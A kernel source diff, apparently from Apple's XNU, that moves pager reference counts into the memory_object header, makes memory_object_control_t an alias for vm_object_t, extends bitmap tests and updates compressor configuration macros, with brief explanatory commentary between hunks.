+               assert(bitmap_lsb_first(map, nbits) == -1);
+
+               /* bitmap_and */
+               bitmap_t *map0 = bitmap_alloc(nbits);
+               assert(bitmap_first(map0, nbits) == -1);
+
+               bitmap_t *map1 = bitmap_alloc(nbits);
+               bitmap_full(map1, nbits);
+               assert(bitmap_is_full(map1, nbits));
+
+               bitmap_and(map, map0, map1, nbits);
+               assert(bitmap_first(map, nbits) == -1);
+
+               bitmap_and(map, map1, map1, nbits);
+               assert(bitmap_is_full(map, nbits));
+
+               /* bitmap_and_not */
+               bitmap_and_not(map, map0, map1, nbits);
+               assert(bitmap_first(map, nbits) == -1);
+
+               bitmap_and_not(map, map1, map0, nbits);
+               assert(bitmap_is_full(map, nbits));
+
+               /* bitmap_equal */
+               for (uint i = 0; i < nbits; i++) {
+                       bitmap_clear(map, i);
+                       assert(!bitmap_equal(map, map1, nbits));
+                       bitmap_set(map, i);
+                       assert(bitmap_equal(map, map1, nbits));
+               }
+
+               /* bitmap_and_not_mask_first */
+               for (uint i = 0; i < nbits; i++) {
+                       bitmap_clear(map, i);
+                       expected_result = i;
+                       int result = bitmap_and_not_mask_first(map1, map, nbits);
+                       assert(result == expected_result);
+                       bitmap_set(map, i);
+                       result = bitmap_and_not_mask_first(map1, map, nbits);
+                       assert(result == -1);
+               }
+
                bitmap_free(map, nbits);
+               bitmap_free(map0, nbits);
+               bitmap_free(map1, nbits);
        }
 }
 
index da46869c7e4d9734a4204776096b793498dbb70c..05e18039062cb46b967dedca29324ce8b7f59ca0 100644 (file)
@@ -85,6 +85,7 @@ extern kern_return_t console_serial_parallel_log_tests(void);
 extern kern_return_t test_os_log(void);
 extern kern_return_t test_os_log_parallel(void);
 extern kern_return_t bitmap_post_test(void);
+extern kern_return_t counter_tests(void);
 
 #ifdef __arm64__
 extern kern_return_t arm64_munger_test(void);
@@ -138,7 +139,8 @@ struct xnupost_test kernel_post_tests[] = {XNUPOST_TEST_CONFIG_BASIC(zalloc_test
 #if __ARM_VFP__
                                           XNUPOST_TEST_CONFIG_BASIC(vfp_state_test),
 #endif
-                                          XNUPOST_TEST_CONFIG_BASIC(vm_tests), };
+                                          XNUPOST_TEST_CONFIG_BASIC(vm_tests),
+                                          XNUPOST_TEST_CONFIG_BASIC(counter_tests)};
 
 uint32_t kernel_post_tests_count = sizeof(kernel_post_tests) / sizeof(xnupost_test_data_t);
 
@@ -405,7 +407,7 @@ zalloc_test(void)
            ZC_DESTRUCTIBLE);
        T_ASSERT_NOTNULL(test_zone, NULL);
 
-       T_ASSERT_EQ_INT(test_zone->countfree, 0, NULL);
+       T_ASSERT_EQ_INT(test_zone->z_elems_free, 0, NULL);
        T_SETUPEND;
 
        T_ASSERT_NOTNULL(test_ptr = zalloc(test_zone), NULL);
index a9c4c8bb54889752c21b261137d0933bb0574ee4..23397bef47b4ddbad1e065fb4a550b4ce496cdcf 100644 (file)
@@ -85,7 +85,7 @@ ptrauth_data_tests(void)
 
        /* task_t */
        ALLOC_VALIDATE_DATA_PTR(struct task, vm_map_t, map, "task.map");
-       ALLOC_VALIDATE_DATA_PTR(struct task, struct ipc_port *, itk_self[0], "task.itk_self");
+       ALLOC_VALIDATE_DATA_PTR(struct task, struct ipc_port *, itk_task_ports[0], "task.itk_task_ports");
        ALLOC_VALIDATE_DATA_PTR(struct task, struct ipc_port *, itk_settable_self, "task.itk_settable_self");
        ALLOC_VALIDATE_DATA_PTR(struct task, struct ipc_port *, itk_host, "task.itk_host");
        ALLOC_VALIDATE_DATA_PTR(struct task, struct ipc_port *, itk_bootstrap, "task.itk_bootstrap");
index d9f9cc2094325e9088355f4a5588ff2a57e710cf..04aaf3450527430a8126986ff45954bbc83b7f63 100644 (file)
@@ -11,6 +11,9 @@ DATAFILES =
 EXPORT_ONLY_FILES = \
        memory_types.h \
        pmap.h \
+       lz4.h \
+       lz4_constants.h \
+       lz4_assembly_select.h \
        vm_fault.h \
        vm_kern.h \
        vm_map.h \
index d85190a4a3e1b4c1d467255093bfb3a6660cd6b1..871b222427c838a8f77a06099b7064954b179827 100644 (file)
@@ -118,7 +118,11 @@ typedef struct vnode_pager {
        struct memory_object vn_pgr_hdr;
 
        /*  pager-specific */
-       struct os_refcnt        ref_count;
+#if MEMORY_OBJECT_HAS_REFCOUNT
+#define vn_pgr_hdr_ref      vn_pgr_hdr.mo_ref
+#else
+       os_ref_atomic_t         vn_pgr_hdr_ref;
+#endif
        struct vnode            *vnode_handle;  /* vnode handle              */
 } *vnode_pager_t;
 
@@ -650,7 +654,7 @@ vnode_pager_reference(
        vnode_pager_t   vnode_object;
 
        vnode_object = vnode_pager_lookup(mem_obj);
-       os_ref_retain(&vnode_object->ref_count);
+       os_ref_retain_raw(&vnode_object->vn_pgr_hdr_ref, NULL);
 }
 
 /*
@@ -666,7 +670,7 @@ vnode_pager_deallocate(
 
        vnode_object = vnode_pager_lookup(mem_obj);
 
-       if (os_ref_release(&vnode_object->ref_count) == 0) {
+       if (os_ref_release_raw(&vnode_object->vn_pgr_hdr_ref, NULL) == 0) {
                if (vnode_object->vnode_handle != NULL) {
                        vnode_pager_vrele(vnode_object->vnode_handle);
                }
@@ -920,7 +924,7 @@ vnode_object_create(
        vnode_object->vn_pgr_hdr.mo_pager_ops = &vnode_pager_ops;
        vnode_object->vn_pgr_hdr.mo_control = MEMORY_OBJECT_CONTROL_NULL;
 
-       os_ref_init(&vnode_object->ref_count, NULL);
+       os_ref_init_raw(&vnode_object->vn_pgr_hdr_ref, NULL);
        vnode_object->vnode_handle = vp;
 
        return vnode_object;
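
This is the first of several pagers in this commit (the device, apple-protect and compressor pagers
below follow suit) whose private reference count moves into the generic memory_object header when
MEMORY_OBJECT_HAS_REFCOUNT is defined; otherwise a raw os_ref_atomic_t stays in the pager struct,
and either storage is driven through the os_ref_*_raw calls. A condensed sketch of the idiom, with
hypothetical names:

/* Condensed illustration of the refcount-aliasing idiom (hypothetical pager). */
typedef struct example_pager {
        struct memory_object    xp_hdr;         /* mandatory generic header */
#if MEMORY_OBJECT_HAS_REFCOUNT
#define xp_hdr_ref              xp_hdr.mo_ref   /* alias the header's count */
#else
        os_ref_atomic_t         xp_hdr_ref;     /* private count otherwise */
#endif
} *example_pager_t;

static void
example_pager_reference(example_pager_t pager)
{
        /* Works against either storage: the macro or the field picks it. */
        os_ref_retain_raw(&pager->xp_hdr_ref, NULL);
}

static void
example_pager_deallocate(example_pager_t pager)
{
        if (os_ref_release_raw(&pager->xp_hdr_ref, NULL) == 0) {
                /* last reference dropped: tear the pager down */
        }
}
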
index 76e537501d969589080b3b88b6ec84a907888ee4..d5bbfecead2c352ecd3cd2fdd088bda8b4b72bfe 100644 (file)
@@ -93,13 +93,23 @@ typedef struct device_pager {
 
        /* pager-specific data */
        lck_mtx_t       lock;
-       struct os_refcnt ref_count;     /* reference count */
        device_port_t   device_handle;  /* device_handle */
        vm_size_t       size;
+#if MEMORY_OBJECT_HAS_REFCOUNT
+#define dev_pgr_hdr_ref dev_pgr_hdr.mo_ref
+#else
+       os_ref_atomic_t dev_pgr_hdr_ref;
+#endif
        int             flags;
        boolean_t       is_mapped;
 } *device_pager_t;
 
+__header_always_inline os_ref_count_t
+device_pager_get_refcount(device_pager_t device_object)
+{
+       return os_ref_get_count_raw(&device_object->dev_pgr_hdr_ref);
+}
+
 LCK_GRP_DECLARE(device_pager_lck_grp, "device_pager");
 
 ZONE_DECLARE(device_pager_zone, "device node pager structures",
@@ -229,7 +239,7 @@ device_pager_lookup(
 
        assert(mem_obj->mo_pager_ops == &device_pager_ops);
        device_object = (device_pager_t)mem_obj;
-       assert(os_ref_get_count(&device_object->ref_count) > 0);
+       assert(device_pager_get_refcount(device_object) > 0);
        return device_object;
 }
 
@@ -357,10 +367,10 @@ device_pager_reference(
        device_pager_t          device_object;
 
        device_object = device_pager_lookup(mem_obj);
-       os_ref_retain(&device_object->ref_count);
+       os_ref_retain_raw(&device_object->dev_pgr_hdr_ref, NULL);
        DTRACE_VM2(device_pager_reference,
            device_pager_t, device_object,
-           unsigned int, os_ref_get_count(&device_object->ref_count));
+           unsigned int, device_pager_get_refcount(device_object));
 }
 
 /*
@@ -372,14 +382,15 @@ device_pager_deallocate(
 {
        device_pager_t          device_object;
        memory_object_control_t device_control;
+       os_ref_count_t          ref_count;
 
        device_object = device_pager_lookup(mem_obj);
 
        DTRACE_VM2(device_pager_deallocate,
            device_pager_t, device_object,
-           unsigned int, os_ref_get_count(&device_object->ref_count));
+           unsigned int, device_pager_get_refcount(device_object));
 
-       os_ref_count_t ref_count = os_ref_release(&device_object->ref_count);
+       ref_count = os_ref_release_raw(&device_object->dev_pgr_hdr_ref, NULL);
 
        if (ref_count == 1) {
                /*
@@ -389,7 +400,7 @@ device_pager_deallocate(
 
                DTRACE_VM2(device_pager_destroy,
                    device_pager_t, device_object,
-                   unsigned int, os_ref_get_count(&device_object->ref_count));
+                   unsigned int, device_pager_get_refcount(device_object));
 
                assert(device_object->is_mapped == FALSE);
                if (device_object->device_handle != (device_port_t) NULL) {
@@ -404,8 +415,14 @@ device_pager_deallocate(
                 */
                DTRACE_VM2(device_pager_free,
                    device_pager_t, device_object,
-                   unsigned int, os_ref_get_count(&device_object->ref_count));
+                   unsigned int, device_pager_get_refcount(device_object));
 
+               device_control = device_object->dev_pgr_hdr.mo_control;
+
+               if (device_control != MEMORY_OBJECT_CONTROL_NULL) {
+                       memory_object_control_deallocate(device_control);
+                       device_object->dev_pgr_hdr.mo_control = MEMORY_OBJECT_CONTROL_NULL;
+               }
                device_pager_lock_destroy(device_object);
 
                zfree(device_pager_zone, device_object);
@@ -469,7 +486,7 @@ device_pager_map(
        device_object = device_pager_lookup(mem_obj);
 
        device_pager_lock(device_object);
-       assert(os_ref_get_count(&device_object->ref_count) > 0);
+       assert(device_pager_get_refcount(device_object) > 0);
        if (device_object->is_mapped == FALSE) {
                /*
                 * First mapping of this pager: take an extra reference
@@ -494,7 +511,7 @@ device_pager_last_unmap(
        device_object = device_pager_lookup(mem_obj);
 
        device_pager_lock(device_object);
-       assert(os_ref_get_count(&device_object->ref_count) > 0);
+       assert(device_pager_get_refcount(device_object) > 0);
        if (device_object->is_mapped) {
                device_object->is_mapped = FALSE;
                drop_ref = TRUE;
@@ -532,12 +549,12 @@ device_object_create(void)
        device_object->dev_pgr_hdr.mo_control = MEMORY_OBJECT_CONTROL_NULL;
 
        device_pager_lock_init(device_object);
-       os_ref_init(&device_object->ref_count, NULL);
+       os_ref_init_raw(&device_object->dev_pgr_hdr_ref, NULL);
        device_object->is_mapped = FALSE;
 
        DTRACE_VM2(device_pager_create,
            device_pager_t, device_object,
-           unsigned int, os_ref_get_count(&device_object->ref_count));
+           unsigned int, device_pager_get_refcount(device_object));
 
        return device_object;
 }
index 512efd04bea6e7055df839867b2af0e274ac0b91..d2b80278c51ebb3739cd138fde9e51e5d59535b6 100644 (file)
 #include "lz4_assembly_select.h"
 #include "lz4_constants.h"
 
+#if CONFIG_IO_COMPRESSION_STATS
+#include <string.h>
+#else
 #define memcpy __builtin_memcpy
+#endif
 
 #pragma mark - Building blocks
 
index 7fa63cc7a9c9ed7fb7fc3e63c9829167f685a881..a952e0d69b0c77d31ad64cbf4aa1a96b6ba75d5c 100644 (file)
@@ -1462,16 +1462,7 @@ memory_object_iopl_request(
                vm_object_reference(object);
                named_entry_unlock(named_entry);
        } else if (ip_kotype(port) == IKOT_MEM_OBJ_CONTROL) {
-               memory_object_control_t control;
-               control = (memory_object_control_t) port;
-               if (control == NULL) {
-                       return KERN_INVALID_ARGUMENT;
-               }
-               object = memory_object_control_to_vm_object(control);
-               if (object == VM_OBJECT_NULL) {
-                       return KERN_INVALID_ARGUMENT;
-               }
-               vm_object_reference(object);
+               panic("unexpected IKOT_MEM_OBJ_CONTROL: %p", port);
        } else {
                return KERN_INVALID_ARGUMENT;
        }
@@ -1638,8 +1629,6 @@ host_default_memory_manager(
                return KERN_INVALID_HOST;
        }
 
-       assert(host_priv == &realhost);
-
        new_manager = *default_manager;
        lck_mtx_lock(&memory_manager_default_lock);
        current_manager = memory_manager_default;
@@ -2006,43 +1995,26 @@ memory_object_is_shared_cache(
        return object->object_is_shared_cache;
 }
 
-static ZONE_DECLARE(mem_obj_control_zone, "mem_obj_control",
-    sizeof(struct memory_object_control), ZC_NOENCRYPT);
-
 __private_extern__ memory_object_control_t
 memory_object_control_allocate(
        vm_object_t             object)
 {
-       memory_object_control_t control;
-
-       control = (memory_object_control_t)zalloc(mem_obj_control_zone);
-       if (control != MEMORY_OBJECT_CONTROL_NULL) {
-               control->moc_object = object;
-               control->moc_ikot = IKOT_MEM_OBJ_CONTROL; /* fake ip_kotype */
-       }
-       return control;
+       return object;
 }
 
 __private_extern__ void
 memory_object_control_collapse(
-       memory_object_control_t control,
+       memory_object_control_t *control,
        vm_object_t             object)
 {
-       assert((control->moc_object != VM_OBJECT_NULL) &&
-           (control->moc_object != object));
-       control->moc_object = object;
+       *control = object;
 }
 
 __private_extern__ vm_object_t
 memory_object_control_to_vm_object(
        memory_object_control_t control)
 {
-       if (control == MEMORY_OBJECT_CONTROL_NULL ||
-           control->moc_ikot != IKOT_MEM_OBJ_CONTROL) {
-               return VM_OBJECT_NULL;
-       }
-
-       return control->moc_object;
+       return control;
 }
 
 __private_extern__ vm_object_t
@@ -2090,17 +2062,16 @@ memory_object_control_reference(
  */
 void
 memory_object_control_deallocate(
-       memory_object_control_t control)
+       __unused memory_object_control_t control)
 {
-       zfree(mem_obj_control_zone, control);
 }
 
 void
 memory_object_control_disable(
-       memory_object_control_t control)
+       memory_object_control_t *control)
 {
-       assert(control->moc_object != VM_OBJECT_NULL);
-       control->moc_object = VM_OBJECT_NULL;
+       assert(*control != VM_OBJECT_NULL);
+       *control = VM_OBJECT_NULL;
 }
 
 void
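
With this change a memory_object_control_t is simply the vm_object_t it used to wrap: allocation
and the control-to-object conversion become identities, the dedicated control zone disappears, and
memory_object_control_deallocate() is a no-op. That is why memory_object_control_collapse() and
memory_object_control_disable() now take a memory_object_control_t * and rewrite the caller's
field in place, and why memory_object_iopl_request() panics if it ever sees an
IKOT_MEM_OBJ_CONTROL port.
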
index 930a660233285569286f6d95ba3d252ad037e70a..cb57eb469c75d5eb586bedb1775684744c089fbc 100644 (file)
@@ -80,7 +80,7 @@ memory_object_control_t memory_object_control_allocate(
 
 __private_extern__
 void                    memory_object_control_collapse(
-       memory_object_control_t control,
+       memory_object_control_t *control,
        vm_object_t             object);
 
 __private_extern__
@@ -95,7 +95,7 @@ mach_port_t             convert_mo_control_to_port(
        memory_object_control_t control);
 
 extern void memory_object_control_disable(
-       memory_object_control_t control);
+       memory_object_control_t *control);
 
 extern
 memory_object_control_t convert_port_to_mo_control(
index 63fee92d7ce83e0a28484e5f526a338ebf231751..d396d8f51f1f9bd76a6c54354cab69374b0bb65e 100644 (file)
@@ -138,6 +138,9 @@ extern void *pmap_steal_memory(vm_size_t size); /* Early memory allocation */
 extern void *pmap_steal_freeable_memory(vm_size_t size); /* Early memory allocation */
 
 extern uint_t pmap_free_pages(void); /* report remaining unused physical pages */
+#if defined(__arm__) || defined(__arm64__)
+extern uint_t pmap_free_pages_span(void); /* report phys address range of unused physical pages */
+#endif /* defined(__arm__) || defined(__arm64__) */
 
 extern void pmap_startup(vm_offset_t *startp, vm_offset_t *endp); /* allocate vm_page structs */
 
@@ -902,6 +905,9 @@ extern bool pmap_is_trust_cache_loaded(const uuid_t uuid);
 extern uint32_t pmap_lookup_in_static_trust_cache(const uint8_t cdhash[CS_CDHASH_LEN]);
 extern bool pmap_lookup_in_loaded_trust_caches(const uint8_t cdhash[CS_CDHASH_LEN]);
 
+extern void pmap_set_compilation_service_cdhash(const uint8_t cdhash[CS_CDHASH_LEN]);
+extern bool pmap_match_compilation_service_cdhash(const uint8_t cdhash[CS_CDHASH_LEN]);
+
 extern bool pmap_in_ppl(void);
 
 extern void *pmap_claim_reserved_ppl_page(void);
@@ -911,6 +917,8 @@ extern void pmap_ledger_alloc_init(size_t);
 extern ledger_t pmap_ledger_alloc(void);
 extern void pmap_ledger_free(ledger_t);
 
+extern bool pmap_is_bad_ram(ppnum_t ppn);
+extern void pmap_retire_page(ppnum_t ppn);
 extern kern_return_t pmap_cs_allow_invalid(pmap_t pmap);
 
 #if __arm64__
index 17b667c2c2b3ef579e1bbe11e8d8ab2896163f1e..f7fcaceb38c4d418139a7d5883d1654833439f0c 100644 (file)
@@ -59,7 +59,6 @@
 #include <vm/vm_protos.h>
 #include <vm/vm_kern.h>
 
-
 /*
  * APPLE PROTECT MEMORY PAGER
  *
@@ -150,13 +149,18 @@ const struct memory_object_pager_ops apple_protect_pager_ops = {
  */
 typedef struct apple_protect_pager {
        /* mandatory generic header */
-       struct memory_object ap_pgr_hdr;
+       struct memory_object    ap_pgr_hdr;
 
        /* pager-specific data */
        queue_chain_t           pager_queue;    /* next & prev pagers */
-       struct os_refcnt        ref_count;      /* reference count */
-       boolean_t               is_ready;       /* is this pager ready ? */
-       boolean_t               is_mapped;      /* is this mem_obj mapped ? */
+#if MEMORY_OBJECT_HAS_REFCOUNT
+#define ap_pgr_hdr_ref          ap_pgr_hdr.mo_ref
+#else
+       os_ref_atomic_t         ap_pgr_hdr_ref;      /* reference count */
+#endif
+       bool                    is_ready;       /* is this pager ready ? */
+       bool                    is_mapped;      /* is this mem_obj mapped ? */
+       bool                    is_cached;      /* is this pager cached ? */
        vm_object_t             backing_object; /* VM obj w/ encrypted data */
        vm_object_offset_t      backing_offset;
        vm_object_offset_t      crypto_backing_offset; /* for key... */
@@ -170,8 +174,8 @@ typedef struct apple_protect_pager {
  * List of memory objects managed by this EMM.
  * The list is protected by the "apple_protect_pager_lock" lock.
  */
-int apple_protect_pager_count = 0;              /* number of pagers */
-int apple_protect_pager_count_mapped = 0;       /* number of unmapped pagers */
+unsigned int apple_protect_pager_count = 0;        /* number of pagers */
+unsigned int apple_protect_pager_count_mapped = 0; /* number of unmapped pagers */
 queue_head_t apple_protect_pager_queue = QUEUE_HEAD_INITIALIZER(apple_protect_pager_queue);
 LCK_GRP_DECLARE(apple_protect_pager_lck_grp, "apple_protect");
 LCK_MTX_DECLARE(apple_protect_pager_lock, &apple_protect_pager_lck_grp);
@@ -179,15 +183,15 @@ LCK_MTX_DECLARE(apple_protect_pager_lock, &apple_protect_pager_lck_grp);
 /*
  * Maximum number of unmapped pagers we're willing to keep around.
  */
-int apple_protect_pager_cache_limit = 20;
+unsigned int apple_protect_pager_cache_limit = 20;
 
 /*
  * Statistics & counters.
  */
-int apple_protect_pager_count_max = 0;
-int apple_protect_pager_count_unmapped_max = 0;
-int apple_protect_pager_num_trim_max = 0;
-int apple_protect_pager_num_trim_total = 0;
+unsigned int apple_protect_pager_count_max = 0;
+unsigned int apple_protect_pager_count_unmapped_max = 0;
+unsigned int apple_protect_pager_num_trim_max = 0;
+unsigned int apple_protect_pager_num_trim_total = 0;
 
 
 
@@ -198,7 +202,8 @@ apple_protect_pager_t apple_protect_pager_create(
        vm_object_offset_t crypto_backing_offset,
        struct pager_crypt_info *crypt_info,
        vm_object_offset_t crypto_start,
-       vm_object_offset_t crypto_end);
+       vm_object_offset_t crypto_end,
+       boolean_t cache_pager);
 apple_protect_pager_t apple_protect_pager_lookup(memory_object_t mem_obj);
 void apple_protect_pager_dequeue(apple_protect_pager_t pager);
 void apple_protect_pager_deallocate_internal(apple_protect_pager_t pager,
@@ -375,7 +380,7 @@ apple_protect_pager_data_request(
 
        pager = apple_protect_pager_lookup(mem_obj);
        assert(pager->is_ready);
-       assert(os_ref_get_count(&pager->ref_count) > 1); /* pager is alive and mapped */
+       assert(os_ref_get_count_raw(&pager->ap_pgr_hdr_ref) > 1); /* pager is alive and mapped */
 
        PAGER_DEBUG(PAGER_PAGEIN, ("apple_protect_pager_data_request: %p, %llx, %x, %x, pager %p\n", mem_obj, offset, length, protection_required, pager));
 
@@ -402,7 +407,7 @@ apple_protect_pager_data_request(
                retval = kr;
                goto done;
        }
-       dst_object = mo_control->moc_object;
+       dst_object = memory_object_control_to_vm_object(mo_control);
        assert(dst_object != VM_OBJECT_NULL);
 
        /*
@@ -743,7 +748,7 @@ apple_protect_pager_reference(
        pager = apple_protect_pager_lookup(mem_obj);
 
        lck_mtx_lock(&apple_protect_pager_lock);
-       os_ref_retain_locked(&pager->ref_count);
+       os_ref_retain_locked_raw(&pager->ap_pgr_hdr_ref, NULL);
        lck_mtx_unlock(&apple_protect_pager_lock);
 }
 
@@ -824,7 +829,8 @@ apple_protect_pager_deallocate_internal(
        boolean_t               locked)
 {
        boolean_t       needs_trimming;
-       int             count_unmapped;
+       unsigned int    count_unmapped;
+       os_ref_count_t  ref_count;
 
        if (!locked) {
                lck_mtx_lock(&apple_protect_pager_lock);
@@ -840,7 +846,7 @@ apple_protect_pager_deallocate_internal(
        }
 
        /* drop a reference on this pager */
-       os_ref_count_t ref_count = os_ref_release_locked(&pager->ref_count);
+       ref_count = os_ref_release_locked_raw(&pager->ap_pgr_hdr_ref, NULL);
 
        if (ref_count == 1) {
                /*
@@ -943,7 +949,7 @@ apple_protect_pager_map(
 
        lck_mtx_lock(&apple_protect_pager_lock);
        assert(pager->is_ready);
-       assert(os_ref_get_count(&pager->ref_count) > 0); /* pager is alive */
+       assert(os_ref_get_count_raw(&pager->ap_pgr_hdr_ref) > 0); /* pager is alive */
        if (pager->is_mapped == FALSE) {
                /*
                 * First mapping of this pager:  take an extra reference
@@ -951,7 +957,7 @@ apple_protect_pager_map(
                 * are removed.
                 */
                pager->is_mapped = TRUE;
-               os_ref_retain_locked(&pager->ref_count);
+               os_ref_retain_locked_raw(&pager->ap_pgr_hdr_ref, NULL);
                apple_protect_pager_count_mapped++;
        }
        lck_mtx_unlock(&apple_protect_pager_lock);
@@ -969,7 +975,7 @@ apple_protect_pager_last_unmap(
        memory_object_t         mem_obj)
 {
        apple_protect_pager_t   pager;
-       int                     count_unmapped;
+       unsigned int            count_unmapped;
 
        PAGER_DEBUG(PAGER_ALL,
            ("apple_protect_pager_last_unmap: %p\n", mem_obj));
@@ -1029,7 +1035,7 @@ apple_protect_pager_lookup(
 
        assert(mem_obj->mo_pager_ops == &apple_protect_pager_ops);
        pager = (apple_protect_pager_t)(uintptr_t) mem_obj;
-       assert(os_ref_get_count(&pager->ref_count) > 0);
+       assert(os_ref_get_count_raw(&pager->ap_pgr_hdr_ref) > 0);
        return pager;
 }
 
@@ -1040,7 +1046,8 @@ apple_protect_pager_create(
        vm_object_offset_t      crypto_backing_offset,
        struct pager_crypt_info *crypt_info,
        vm_object_offset_t      crypto_start,
-       vm_object_offset_t      crypto_end)
+       vm_object_offset_t      crypto_end,
+       boolean_t               cache_pager)
 {
        apple_protect_pager_t   pager, pager2;
        memory_object_control_t control;
@@ -1064,8 +1071,16 @@ apple_protect_pager_create(
        pager->ap_pgr_hdr.mo_control = MEMORY_OBJECT_CONTROL_NULL;
 
        pager->is_ready = FALSE;/* not ready until it has a "name" */
-       os_ref_init_count(&pager->ref_count, NULL, 2); /* existence reference (for the cache) and another for the caller */
+       /* one reference for the caller */
+       os_ref_init_count_raw(&pager->ap_pgr_hdr_ref, NULL, 1);
        pager->is_mapped = FALSE;
+       if (cache_pager) {
+               /* extra reference for the cache */
+               os_ref_retain_locked_raw(&pager->ap_pgr_hdr_ref, NULL);
+               pager->is_cached = true;
+       } else {
+               pager->is_cached = false;
+       }
        pager->backing_object = backing_object;
        pager->backing_offset = backing_offset;
        pager->crypto_backing_offset = crypto_backing_offset;
@@ -1208,7 +1223,8 @@ apple_protect_pager_setup(
        vm_object_offset_t      crypto_backing_offset,
        struct pager_crypt_info *crypt_info,
        vm_object_offset_t      crypto_start,
-       vm_object_offset_t      crypto_end)
+       vm_object_offset_t      crypto_end,
+       boolean_t               cache_pager)
 {
        apple_protect_pager_t   pager;
        struct pager_crypt_info *old_crypt_info, *new_crypt_info;
@@ -1295,7 +1311,7 @@ apple_protect_pager_setup(
                        crypt_info_deallocate(old_crypt_info);
                        assert(old_crypt_info->crypt_refcnt > 0);
                        /* give extra reference on pager to the caller */
-                       os_ref_retain_locked(&pager->ref_count);
+                       os_ref_retain_locked_raw(&pager->ap_pgr_hdr_ref, NULL);
                        break;
                }
        }
@@ -1335,7 +1351,8 @@ apple_protect_pager_setup(
                                crypto_backing_offset,
                                new_crypt_info,
                                crypto_start,
-                               crypto_end);
+                               crypto_end,
+                               cache_pager);
                }
                if (pager == APPLE_PROTECT_PAGER_NULL) {
                        /* could not create a new pager */
@@ -1386,8 +1403,8 @@ apple_protect_pager_trim(void)
 {
        apple_protect_pager_t   pager, prev_pager;
        queue_head_t            trim_queue;
-       int                     num_trim;
-       int                     count_unmapped;
+       unsigned int            num_trim;
+       unsigned int            count_unmapped;
 
        lck_mtx_lock(&apple_protect_pager_lock);
 
@@ -1407,7 +1424,8 @@ apple_protect_pager_trim(void)
                prev_pager = (apple_protect_pager_t)
                    queue_prev(&pager->pager_queue);
 
-               if (os_ref_get_count(&pager->ref_count) == 2 &&
+               if (pager->is_cached &&
+                   os_ref_get_count_raw(&pager->ap_pgr_hdr_ref) == 2 &&
                    pager->is_ready &&
                    !pager->is_mapped) {
                        /* this pager can be trimmed */
@@ -1441,6 +1459,8 @@ apple_protect_pager_trim(void)
                    pager,
                    apple_protect_pager_t,
                    pager_queue);
+               assert(pager->is_cached);
+               pager->is_cached = false;
                pager->pager_queue.next = NULL;
                pager->pager_queue.prev = NULL;
                /*
@@ -1448,7 +1468,8 @@ apple_protect_pager_trim(void)
                 * has already been dequeued, but we still need to remove
                 * a reference.
                 */
-               os_ref_count_t __assert_only count = os_ref_release_locked(&pager->ref_count);
+               os_ref_count_t __assert_only count;
+               count = os_ref_release_locked_raw(&pager->ap_pgr_hdr_ref, NULL);
                assert(count == 1);
                apple_protect_pager_terminate_internal(pager);
        }
index 92a53eb22b3bcfea72e608e6518315fa17b6e546..315c8b429173900981277393e75256c411f3be3e 100644 (file)
@@ -118,7 +118,7 @@ boolean_t validate_c_segs = TRUE;
  * the boot-arg & device-tree code.
  */
 
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
 
 #if CONFIG_FREEZE
 int     vm_compressor_mode = VM_PAGER_FREEZER_DEFAULT;
@@ -127,10 +127,10 @@ struct  freezer_context freezer_context_global;
 int     vm_compressor_mode = VM_PAGER_NOT_CONFIGURED;
 #endif /* CONFIG_FREEZE */
 
-#else /* CONFIG_EMBEDDED */
+#else /* !XNU_TARGET_OS_OSX */
 int             vm_compressor_mode = VM_PAGER_COMPRESSOR_WITH_SWAP;
 
-#endif /* CONFIG_EMBEDDED */
+#endif /* !XNU_TARGET_OS_OSX */
 
 TUNABLE(uint32_t, vm_compression_limit, "vm_compression_limit", 0);
 int             vm_compressor_is_active = 0;
@@ -344,9 +344,9 @@ static void vm_compressor_do_delayed_compactions(boolean_t);
 static void vm_compressor_compact_and_swap(boolean_t);
 static void vm_compressor_age_swapped_in_segments(boolean_t);
 
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
 static void vm_compressor_take_paging_space_action(void);
-#endif
+#endif /* XNU_TARGET_OS_OSX */
 
 void compute_swapout_target_age(void);
 
@@ -481,7 +481,7 @@ vm_wants_task_throttled(task_t task)
 TUNABLE(bool, kill_on_no_paging_space, "-kill_on_no_paging_space", false);
 #endif /* DEVELOPMENT || DEBUG */
 
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
 
 static uint32_t no_paging_space_action_in_progress = 0;
 extern void memorystatus_send_low_swap_note(void);
@@ -510,7 +510,7 @@ vm_compressor_take_paging_space_action(void)
                }
        }
 }
-#endif /* !CONFIG_EMBEDDED */
+#endif /* XNU_TARGET_OS_OSX */
 
 
 void
@@ -623,12 +623,12 @@ vm_compressor_init(void)
 
        assert((C_SEGMENTS_PER_PAGE * sizeof(union c_segu)) == PAGE_SIZE);
 
-#ifdef CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
        vm_compressor_minorcompact_threshold_divisor = 20;
        vm_compressor_majorcompact_threshold_divisor = 30;
        vm_compressor_unthrottle_threshold_divisor = 40;
        vm_compressor_catchup_threshold_divisor = 60;
-#else
+#else /* !XNU_TARGET_OS_OSX */
        if (max_mem <= (3ULL * 1024ULL * 1024ULL * 1024ULL)) {
                vm_compressor_minorcompact_threshold_divisor = 11;
                vm_compressor_majorcompact_threshold_divisor = 13;
@@ -640,7 +640,7 @@ vm_compressor_init(void)
                vm_compressor_unthrottle_threshold_divisor = 35;
                vm_compressor_catchup_threshold_divisor = 50;
        }
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
 
        queue_init(&c_bad_list_head);
        queue_init(&c_age_list_head);
@@ -663,7 +663,7 @@ vm_compressor_init(void)
        compressor_pool_max_size = C_SEG_MAX_LIMIT;
        compressor_pool_max_size *= C_SEG_BUFSIZE;
 
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
 
        if (vm_compression_limit == 0) {
                if (max_mem <= (4ULL * 1024ULL * 1024ULL * 1024ULL)) {
@@ -1309,14 +1309,14 @@ c_seg_switch_state(c_segment_t c_seg, int new_state, boolean_t insert_head)
 {
        int     old_state = c_seg->c_state;
 
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
 #if     DEVELOPMENT || DEBUG
        if (new_state != C_IS_FILLING) {
                LCK_MTX_ASSERT(&c_seg->c_lock, LCK_MTX_ASSERT_OWNED);
        }
        LCK_MTX_ASSERT(c_list_lock, LCK_MTX_ASSERT_OWNED);
 #endif
-#endif /* !CONFIG_EMBEDDED */
+#endif /* XNU_TARGET_OS_OSX */
        switch (old_state) {
        case C_IS_EMPTY:
